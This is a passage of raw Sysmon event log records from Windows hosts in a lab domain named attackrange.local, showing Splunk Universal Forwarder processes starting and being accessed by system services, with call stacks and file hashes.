Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000976059Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 08:59:26.751{69CF5F33-87EE-6151-6D79-00000000FD01}3256C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{69CF5F33-7F27-614D-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000976058Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 08:59:26.328{69CF5F33-87EE-6151-6C79-00000000FD01}34403792C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976057Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 08:59:26.078{69CF5F33-7F2A-614D-2B00-00000000FD01}28562876C:\Windows\system32\conhost.exe{69CF5F33-87EE-6151-6C79-00000000FD01}3440C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976056Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 08:59:26.078{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976055Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 08:59:26.078{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976054Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 08:59:26.078{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976053Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 08:59:26.078{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976052Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 08:59:26.078{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976051Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 08:59:26.078{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976050Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 08:59:26.078{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976049Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 08:59:26.078{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976048Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 08:59:26.078{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976047Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 08:59:26.078{69CF5F33-7F27-614D-0500-00000000FD01}408524C:\Windows\system32\csrss.exe{69CF5F33-87EE-6151-6C79-00000000FD01}3440C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000976046Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 08:59:26.078{69CF5F33-7F29-614D-1D00-00000000FD01}19603060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{69CF5F33-87EE-6151-6C79-00000000FD01}3440C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000976045Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 08:59:26.063{69CF5F33-87EE-6151-6C79-00000000FD01}3440C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{69CF5F33-7F27-614D-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001047576Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 08:59:27.531{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2C7956E0B933991D7BC324BBE165C849,SHA256=AAB3A52F749DB92D034E785ED64A96F6473889E27743663BD203348E81AECFD7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000976087Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 08:59:27.453{69CF5F33-7F2A-614D-2B00-00000000FD01}28562876C:\Windows\system32\conhost.exe{69CF5F33-87EF-6151-6E79-00000000FD01}3500C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976086Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 08:59:27.453{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976085Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 08:59:27.453{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976084Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 08:59:27.453{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976083Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 08:59:27.453{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976082Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 08:59:27.453{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976081Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 08:59:27.453{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976080Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 08:59:27.453{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976079Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 08:59:27.453{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976078Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 08:59:27.453{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976077Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 08:59:27.453{69CF5F33-7F27-614D-0500-00000000FD01}408424C:\Windows\system32\csrss.exe{69CF5F33-87EF-6151-6E79-00000000FD01}3500C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000976076Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 08:59:27.453{69CF5F33-7F29-614D-1D00-00000000FD01}19603060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{69CF5F33-87EF-6151-6E79-00000000FD01}3500C:\Program 